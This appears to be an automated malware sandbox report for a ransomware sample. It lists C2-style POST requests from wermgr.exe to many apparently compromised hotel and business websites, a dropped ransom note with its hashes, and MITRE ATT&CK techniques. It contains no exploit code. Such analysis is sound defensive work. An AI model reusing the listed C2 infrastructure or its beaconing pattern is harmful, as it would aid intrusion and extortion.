https://tse1.mm.bing.net/th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 519937
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8AD8F5C714D242C6882F92F27A4EF1E8 Ref B: LON04EDGE0821 Ref C: 2024-03-15T21:41:24Z
date: Fri, 15 Mar 2024 21:41:23 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 174745
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D507DBEA460348BDBBF1F0D8CF4288E7 Ref B: LON04EDGE0821 Ref C: 2024-03-15T21:41:28Z
date: Fri, 15 Mar 2024 21:41:28 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR
DNS

www.bnbdelacolline.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.bnbdelacolline.com

IN A

Response

www.bnbdelacolline.com

IN A

128.65.195.174
DNS

www.bnbdelacolline.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.bnbdelacolline.com

IN A
DNS

www.bnbdelacolline.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.bnbdelacolline.com

IN A
POST

https://www.bnbdelacolline.com/wp-content/imgs/fuzuse.gif

wermgr.exe

Remote address:

128.65.195.174:443

Request

POST /wp-content/imgs/fuzuse.gif HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.bnbdelacolline.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

date: Fri, 15 Mar 2024 21:42:05 GMT
server: Apache
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://bnbdelacolline.com/wp-json/>; rel="https://api.w.org/"
strict-transport-security: max-age=16000000
upgrade: h2
connection: Upgrade
transfer-encoding: chunked
content-type: text/html; charset=UTF-8
DNS

174.195.65.128.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.195.65.128.in-addr.arpa

IN PTR

Response

174.195.65.128.in-addr.arpa

IN PTR

h2web148 infomaniakch
DNS

174.195.65.128.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.195.65.128.in-addr.arpa

IN PTR
DNS

www.elite-hotel.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.elite-hotel.com

IN A

Response

www.elite-hotel.com

IN A

80.74.144.93
DNS

www.elite-hotel.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.elite-hotel.com

IN A

Response

www.elite-hotel.com

IN A

80.74.144.93
POST

https://www.elite-hotel.com/content/imgs/dahedaso.jpg

wermgr.exe

Remote address:

80.74.144.93:443

Request

POST /content/imgs/dahedaso.jpg HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.elite-hotel.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Fri, 15 Mar 2024 21:42:06 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://elite-hotel.com/content/imgs/dahedaso.jpg
DNS

elite-hotel.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

elite-hotel.com

IN A

Response

elite-hotel.com

IN A

80.74.144.93
DNS

elite-hotel.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

elite-hotel.com

IN A

Response

elite-hotel.com

IN A

80.74.144.93
GET

https://elite-hotel.com/content/imgs/dahedaso.jpg

wermgr.exe

Remote address:

80.74.144.93:443

Request

GET /content/imgs/dahedaso.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Host: elite-hotel.com
Connection: Keep-Alive
DNS

93.144.74.80.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.144.74.80.in-addr.arpa

IN PTR

Response

93.144.74.80.in-addr.arpa

IN PTR

plutokreativmediach
DNS

93.144.74.80.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.144.74.80.in-addr.arpa

IN PTR

Response

93.144.74.80.in-addr.arpa

IN PTR

plutokreativmediach

77.75.249.22:443

https://www.2mmotorsport.biz/static/tmp/hederu.gif

tls, http

wermgr.exe

4.3kB
46.3kB
45
38

HTTP Request

POST https://www.2mmotorsport.biz/static/tmp/hederu.gif

HTTP Response

404
217.26.53.161:443

https://www.haargenau.biz/wp-content/pictures/sokamethzu.png

tls, http

wermgr.exe

2.1kB
9.5kB
19
13

HTTP Request

POST https://www.haargenau.biz/wp-content/pictures/sokamethzu.png

HTTP Response

404
94.126.20.68:443

https://www.holzbock.biz/data/graphic/zumerumoka.jpg

tls, http

wermgr.exe

3.3kB
5.7kB
19
11

HTTP Request

POST https://www.holzbock.biz/data/graphic/zumerumoka.jpg

HTTP Response

301
94.126.20.68:443

https://www.schreiner-freiamt.ch/data/graphic/zumerumoka.jpg

tls, http

wermgr.exe

1.2kB
5.8kB
16
12

HTTP Request

GET https://www.schreiner-freiamt.ch/data/graphic/zumerumoka.jpg

HTTP Response

200
195.15.227.239:443

https://www.pizcam.com/uploads/tmp/imthkeru.jpg

tls, http

wermgr.exe

3.1kB
32.5kB
34
27

HTTP Request

POST https://www.pizcam.com/uploads/tmp/imthkeru.jpg

HTTP Response

404
83.138.86.12:443

www.swisswellness.com

wermgr.exe

260 B
120 B
5
3
38.207.226.122:443

www.hotelweisshorn.com

tls

wermgr.exe

379 B
92 B
4
2
38.207.226.122:443

www.hotelweisshorn.com

wermgr.exe

260 B
80 B
5
2
38.207.226.122:443

www.hotelweisshorn.com

wermgr.exe

260 B
80 B
5
2
83.166.138.7:443

https://www.whitepod.com/includes/pics/dazu.bmp

tls, http

wermgr.exe

3.8kB
35.9kB
37
31

HTTP Request

POST https://www.whitepod.com/includes/pics/dazu.bmp

HTTP Response

404
18.207.88.16:443

https://www.hardrockhoteldavos.com/wp-content/images/moka.gif

tls, http

wermgr.exe

2.1kB
5.8kB
14
10

HTTP Request

POST https://www.hardrockhoteldavos.com/wp-content/images/moka.gif

HTTP Response

302
151.101.3.52:443

https://www.hardrockhotels.com/davos/wp-content/images/moka.gif

tls, http

wermgr.exe

1.4kB
5.7kB
13
11

HTTP Request

GET https://www.hardrockhotels.com/davos/wp-content/images/moka.gif

HTTP Response

301
192.124.249.36:80

http://crl.starfieldtech.com/sfroot-g2.crl

http

wermgr.exe

411 B
1.3kB
6
5

HTTP Request

GET http://crl.starfieldtech.com/sfroot-g2.crl

HTTP Response

200
151.101.3.3:80

http://ocsp.int-r1.certainly.com/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQ9Cy058uESb%2B0ddJm5bqXlFvfbcAQUvZed36HYGyWZ4wwEBolkEtdlJMcCEnd2YigN57LwySLgroIvX%2FsBZg%3D%3D

http

wermgr.exe

874 B
4.6kB
8
7

HTTP Request

GET http://ocsp.int-r1.certainly.com/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQ9Cy058uESb%2B0ddJm5bqXlFvfbcAQUvZed36HYGyWZ4wwEBolkEtdlJMcCEncbeVVuf6QgJrWoBIXbzoV%2B3Q%3D%3D

HTTP Response

200

HTTP Request

GET http://ocsp.int-r1.certainly.com/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQ9Cy058uESb%2B0ddJm5bqXlFvfbcAQUvZed36HYGyWZ4wwEBolkEtdlJMcCEnd2YigN57LwySLgroIvX%2FsBZg%3D%3D

HTTP Response

200
151.101.3.52:443

https://hotel.hardrock.com/davos/wp-content/images/moka.gif

tls, http

wermgr.exe

2.3kB
39.8kB
38
35

HTTP Request

GET https://hotel.hardrock.com/davos/wp-content/images/moka.gif

HTTP Response

200
172.67.68.116:443

https://www.belvedere-locarno.com/includes/image/rueses.bmp

tls, http

wermgr.exe

2.6kB
21.1kB
31
27

HTTP Request

POST https://www.belvedere-locarno.com/includes/image/rueses.bmp

HTTP Response

404
173.222.13.40:80

http://x2.c.lencr.org/

http

wermgr.exe

299 B
720 B
4
3

HTTP Request

GET http://x2.c.lencr.org/

HTTP Response

200
18.132.18.63:443

https://www.hotelfarinet.com/static/pics/hemerufu.gif

tls, http

wermgr.exe

1.8kB
6.1kB
14
10

HTTP Request

POST https://www.hotelfarinet.com/static/pics/hemerufu.gif

HTTP Response

404
156.235.147.122:443

www.hrk-ramoz.com

wermgr.exe

260 B
200 B
5
5
194.191.24.37:443

https://www.morcote-residenza.com/static/pics/hefu.png

tls, http

wermgr.exe

3.8kB
66.5kB
57
53

HTTP Request

POST https://www.morcote-residenza.com/static/pics/hefu.png

HTTP Response

404
136.243.162.140:443

https://www.seitensprungzimmer24.com/news/images/thkamo.bmp

tls, http

wermgr.exe

2.0kB
6.1kB
17
13

HTTP Request

POST https://www.seitensprungzimmer24.com/news/images/thkamo.bmp

HTTP Response

301
136.243.162.140:443

https://seitensprungzimmer24.com/news/images/thkamo.bmp

tls, http

wermgr.exe

1.6kB
21.0kB
24
20

HTTP Request

GET https://seitensprungzimmer24.com/news/images/thkamo.bmp

HTTP Response

404
213.186.33.5:443

www.arbezie-hotel.com

tls

wermgr.exe

326 B
84 B
3
2
213.186.33.5:443

www.arbezie-hotel.com

tls

wermgr.exe

272 B
84 B
3
2
213.186.33.5:443

www.arbezie-hotel.com

wermgr.exe

260 B
160 B
5
4
213.186.33.5:443

www.arbezie-hotel.com

wermgr.exe

260 B
160 B
5
4
83.166.138.13:443

https://www.aubergemontblanc.com/uploads/pics/thzuth.bmp

tls, http

wermgr.exe

3.6kB
57.9kB
51
46

HTTP Request

POST https://www.aubergemontblanc.com/uploads/pics/thzuth.bmp

HTTP Response

404
128.65.195.228:443

https://www.torhotel.com/data/assets/meruseam.jpg

tls, http

wermgr.exe

3.7kB
31.3kB
35
28

HTTP Request

POST https://www.torhotel.com/data/assets/meruseam.jpg

HTTP Response

404
217.26.55.76:443

https://www.alpenlodge.com/wp-content/pictures/ruimammoso.jpg

tls, http

wermgr.exe

3.1kB
40.4kB
40
35

HTTP Request

POST https://www.alpenlodge.com/wp-content/pictures/ruimammoso.jpg

HTTP Response

404
15.197.142.173:443

www.aparthotelzurich.com

wermgr.exe

260 B
5
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
8.1kB
17
13
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.4kB
8.1kB
19
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.5kB
8.1kB
20
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4

tls, http2

80.5kB
2.3MB
1683
1679

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388209_1UI7TWFL2FR2S3CP9&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388208_1P9RJKIJ8V43BR17K&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200
3.33.152.147:443

www.aparthotelzurich.com

wermgr.exe

260 B
5
128.65.195.174:443

https://www.bnbdelacolline.com/wp-content/imgs/fuzuse.gif

tls, http

wermgr.exe

2.5kB
25.0kB
29
24

HTTP Request

POST https://www.bnbdelacolline.com/wp-content/imgs/fuzuse.gif

HTTP Response

404
80.74.144.93:443

https://www.elite-hotel.com/content/imgs/dahedaso.jpg

tls, http

wermgr.exe

1.9kB
5.8kB
14
10

HTTP Request

POST https://www.elite-hotel.com/content/imgs/dahedaso.jpg

HTTP Response

301
80.74.144.93:443

https://elite-hotel.com/content/imgs/dahedaso.jpg

tls, http

wermgr.exe

1.3kB
5.3kB
13
10

HTTP Request

GET https://elite-hotel.com/content/imgs/dahedaso.jpg

8.8.8.8:53

67.31.126.40.in-addr.arpa

dns

143 B
265 B
2
2

DNS Request

67.31.126.40.in-addr.arpa

DNS Request

161.53.26.217.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

191.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

191.178.17.96.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

219 B
147 B
3
1

DNS Request

133.211.185.52.in-addr.arpa

DNS Request

133.211.185.52.in-addr.arpa

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

213 B
135 B
3
1

DNS Request

41.110.16.96.in-addr.arpa

DNS Request

41.110.16.96.in-addr.arpa

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

www.2mmotorsport.biz

dns

wermgr.exe

66 B
82 B
1
1

DNS Request

www.2mmotorsport.biz

DNS Response

77.75.249.22
8.8.8.8:53

22.249.75.77.in-addr.arpa

dns

71 B
111 B
1
1

DNS Request

22.249.75.77.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

40.13.222.173.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

40.13.222.173.in-addr.arpa
8.8.8.8:53

201.179.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

201.179.17.96.in-addr.arpa
8.8.8.8:53

www.haargenau.biz

dns

wermgr.exe

63 B
79 B
1
1

DNS Request

www.haargenau.biz

DNS Response

217.26.53.161
8.8.8.8:53

195.177.78.104.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

195.177.78.104.in-addr.arpa
8.8.8.8:53

23.149.64.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

23.149.64.172.in-addr.arpa
8.8.8.8:53

119.110.54.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

119.110.54.20.in-addr.arpa
8.8.8.8:53

www.bizziniinfissi.com

dns

wermgr.exe

68 B
141 B
1
1

DNS Request

www.bizziniinfissi.com
8.8.8.8:53

www.holzbock.biz

dns

wermgr.exe

62 B
92 B
1
1

DNS Request

www.holzbock.biz

DNS Response

94.126.20.68
8.8.8.8:53

233.38.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

233.38.18.104.in-addr.arpa
8.8.8.8:53

68.20.126.94.in-addr.arpa

dns

71 B
142 B
1
1

DNS Request

68.20.126.94.in-addr.arpa
8.8.8.8:53

www.schreiner-freiamt.ch

dns

wermgr.exe

70 B
100 B
1
1

DNS Request

www.schreiner-freiamt.ch

DNS Response

94.126.20.68
8.8.8.8:53

www.fliptray.biz

dns

wermgr.exe

62 B
124 B
1
1

DNS Request

www.fliptray.biz
8.8.8.8:53

www.pizcam.com

dns

wermgr.exe

60 B
76 B
1
1

DNS Request

www.pizcam.com

DNS Response

195.15.227.239
8.8.8.8:53

239.227.15.195.in-addr.arpa

dns

146 B
114 B
2
1

DNS Request

239.227.15.195.in-addr.arpa

DNS Request

239.227.15.195.in-addr.arpa
8.8.8.8:53

217.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

217.135.221.88.in-addr.arpa
8.8.8.8:53

www.swisswellness.com

dns

wermgr.exe

134 B
83 B
2
1

DNS Request

www.swisswellness.com

DNS Request

www.swisswellness.com

DNS Response

83.138.86.12
8.8.8.8:53

206.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

206.178.17.96.in-addr.arpa
8.8.8.8:53

www.hotelweisshorn.com

dns

wermgr.exe

136 B
84 B
2
1

DNS Request

www.hotelweisshorn.com

DNS Request

www.hotelweisshorn.com

DNS Response

38.207.226.122
8.8.8.8:53

83.135.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

83.135.221.88.in-addr.arpa
8.8.8.8:53

122.226.207.38.in-addr.arpa

dns

146 B
262 B
2
2

DNS Request

122.226.207.38.in-addr.arpa

DNS Request

122.226.207.38.in-addr.arpa
8.8.8.8:53

208.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

208.178.17.96.in-addr.arpa

DNS Request

208.178.17.96.in-addr.arpa
8.8.8.8:53

www.whitepod.com

dns

wermgr.exe

62 B
78 B
1
1

DNS Request

www.whitepod.com

DNS Response

83.166.138.7
8.8.8.8:53

7.138.166.83.in-addr.arpa

dns

142 B
106 B
2
1

DNS Request

7.138.166.83.in-addr.arpa

DNS Request

7.138.166.83.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

www.hardrockhoteldavos.com

dns

wermgr.exe

144 B
125 B
2
1

DNS Request

www.hardrockhoteldavos.com

DNS Request

www.hardrockhoteldavos.com

DNS Response

18.207.88.16
8.8.8.8:53

www.hardrockhotels.com

dns

wermgr.exe

68 B
169 B
1
1

DNS Request

www.hardrockhotels.com

DNS Response

151.101.3.52

151.101.67.52

151.101.131.52

151.101.195.52
8.8.8.8:53

16.88.207.18.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

16.88.207.18.in-addr.arpa
8.8.8.8:53

crl.starfieldtech.com

dns

wermgr.exe

134 B
314 B
2
2

DNS Request

crl.starfieldtech.com

DNS Request

crl.starfieldtech.com

DNS Response

192.124.249.36

192.124.249.41

192.124.249.31

DNS Response

192.124.249.36

192.124.249.41

192.124.249.31
8.8.8.8:53

ocsp.int-r1.certainly.com

dns

wermgr.exe

71 B
178 B
1
1

DNS Request

ocsp.int-r1.certainly.com

DNS Response

151.101.3.3

151.101.67.3

151.101.131.3

151.101.195.3
8.8.8.8:53

52.3.101.151.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

52.3.101.151.in-addr.arpa
8.8.8.8:53

36.249.124.192.in-addr.arpa

dns

73 B
113 B
1
1

DNS Request

36.249.124.192.in-addr.arpa
8.8.8.8:53

3.3.101.151.in-addr.arpa

dns

70 B
130 B
1
1

DNS Request

3.3.101.151.in-addr.arpa
8.8.8.8:53

hotel.hardrock.com

dns

wermgr.exe

128 B
165 B
2
1

DNS Request

hotel.hardrock.com

DNS Request

hotel.hardrock.com

DNS Response

151.101.3.52

151.101.67.52

151.101.131.52

151.101.195.52
8.8.8.8:53

www.belvedere-locarno.com

dns

wermgr.exe

142 B
238 B
2
2

DNS Request

www.belvedere-locarno.com

DNS Request

www.belvedere-locarno.com

DNS Response

172.67.68.116

104.26.6.206

104.26.7.206

DNS Response

104.26.7.206

104.26.6.206

172.67.68.116
8.8.8.8:53

x2.c.lencr.org

dns

wermgr.exe

120 B
165 B
2
1

DNS Request

x2.c.lencr.org

DNS Request

x2.c.lencr.org

DNS Response

173.222.13.40
8.8.8.8:53

www.hotelfarinet.com

dns

wermgr.exe

66 B
82 B
1
1

DNS Request

www.hotelfarinet.com

DNS Response

18.132.18.63
8.8.8.8:53

116.68.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

116.68.67.172.in-addr.arpa
8.8.8.8:53

www.hrk-ramoz.com

dns

wermgr.exe

126 B
158 B
2
2

DNS Request

www.hrk-ramoz.com

DNS Request

www.hrk-ramoz.com

DNS Response

156.235.147.122

DNS Response

156.235.147.122
8.8.8.8:53

63.18.132.18.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

63.18.132.18.in-addr.arpa
8.8.8.8:53

www.morcote-residenza.com

dns

wermgr.exe

142 B
174 B
2
2

DNS Request

www.morcote-residenza.com

DNS Request

www.morcote-residenza.com

DNS Response

194.191.24.37

DNS Response

194.191.24.37
8.8.8.8:53

37.24.191.194.in-addr.arpa

dns

144 B
216 B
2
2

DNS Request

37.24.191.194.in-addr.arpa

DNS Request

37.24.191.194.in-addr.arpa
8.8.8.8:53

www.seitensprungzimmer24.com

dns

wermgr.exe

148 B
180 B
2
2

DNS Request

www.seitensprungzimmer24.com

DNS Request

www.seitensprungzimmer24.com

DNS Response

136.243.162.140

DNS Response

136.243.162.140
8.8.8.8:53

seitensprungzimmer24.com

dns

wermgr.exe

140 B
172 B
2
2

DNS Request

seitensprungzimmer24.com

DNS Request

seitensprungzimmer24.com

DNS Response

136.243.162.140

DNS Response

136.243.162.140
8.8.8.8:53

140.162.243.136.in-addr.arpa

dns

74 B
109 B
1
1

DNS Request

140.162.243.136.in-addr.arpa
8.8.8.8:53

www.arbezie-hotel.com

dns

wermgr.exe

67 B
83 B
1
1

DNS Request

www.arbezie-hotel.com

DNS Response

213.186.33.5
8.8.8.8:53

5.33.186.213.in-addr.arpa

dns

71 B
101 B
1
1

DNS Request

5.33.186.213.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

www.aubergemontblanc.com

dns

wermgr.exe

140 B
172 B
2
2

DNS Request

www.aubergemontblanc.com

DNS Request

www.aubergemontblanc.com

DNS Response

83.166.138.13

DNS Response

83.166.138.13
8.8.8.8:53

13.138.166.83.in-addr.arpa

dns

144 B
214 B
2
2

DNS Request

13.138.166.83.in-addr.arpa

DNS Request

13.138.166.83.in-addr.arpa
8.8.8.8:53

www.torhotel.com

dns

wermgr.exe

124 B
156 B
2
2

DNS Request

www.torhotel.com

DNS Request

www.torhotel.com

DNS Response

128.65.195.228

DNS Response

128.65.195.228
8.8.8.8:53

228.195.65.128.in-addr.arpa

dns

146 B
218 B
2
2

DNS Request

228.195.65.128.in-addr.arpa

DNS Request

228.195.65.128.in-addr.arpa
8.8.8.8:53

www.alpenlodge.com

dns

wermgr.exe

128 B
160 B
2
2

DNS Request

www.alpenlodge.com

DNS Request

www.alpenlodge.com

DNS Response

217.26.55.76

DNS Response

217.26.55.76
8.8.8.8:53

76.55.26.217.in-addr.arpa

dns

142 B
107 B
2
1

DNS Request

76.55.26.217.in-addr.arpa

DNS Request

76.55.26.217.in-addr.arpa
8.8.8.8:53

www.aparthotelzurich.com

dns

wermgr.exe

212 B
430 B
3
3

DNS Request

www.aparthotelzurich.com

DNS Response

15.197.142.173

3.33.152.147

DNS Request

205.47.74.20.in-addr.arpa

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

124 B
346 B
2
2

DNS Request

tse1.mm.bing.net

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

146 B
106 B
2
1

DNS Request

200.197.79.204.in-addr.arpa

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

www.bnbdelacolline.com

dns

wermgr.exe

204 B
84 B
3
1

DNS Request

www.bnbdelacolline.com

DNS Request

www.bnbdelacolline.com

DNS Request

www.bnbdelacolline.com

DNS Response

128.65.195.174
8.8.8.8:53

174.195.65.128.in-addr.arpa

dns

146 B
109 B
2
1

DNS Request

174.195.65.128.in-addr.arpa

DNS Request

174.195.65.128.in-addr.arpa
8.8.8.8:53

www.elite-hotel.com

dns

wermgr.exe

130 B
162 B
2
2

DNS Request

www.elite-hotel.com

DNS Request

www.elite-hotel.com

DNS Response

80.74.144.93

DNS Response

80.74.144.93
8.8.8.8:53

elite-hotel.com

dns

wermgr.exe

122 B
154 B
2
2

DNS Request

elite-hotel.com

DNS Request

elite-hotel.com

DNS Response

80.74.144.93

DNS Response

80.74.144.93
8.8.8.8:53

93.144.74.80.in-addr.arpa

dns

142 B
212 B
2
2

DNS Request

93.144.74.80.in-addr.arpa

DNS Request

93.144.74.80.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3270530367-132075249-2153716227-1000\XJUXCGPDEA-DECRYPT.txt

Filesize
8KB

MD5
f5330df527b2d88055427525cc5fb9c8

SHA1
864ddf9ecf661007d3dec2cfb94fe1b705b1d73d

SHA256
591137a96d37712e07ab765d580ed31d781ee84b8a7e78953f18ca1a30c96572

SHA512
4dae46a0c35271f2d2a9dd02c040af56dae1e38481510512005688a6cc20d6e09bb5b50ff514573625757f32149348c4445be67b5a3d8c94739084b2bab3c2df

Download Submit
memory/1564-1-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1564-706-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1564-714-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/2076-0-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request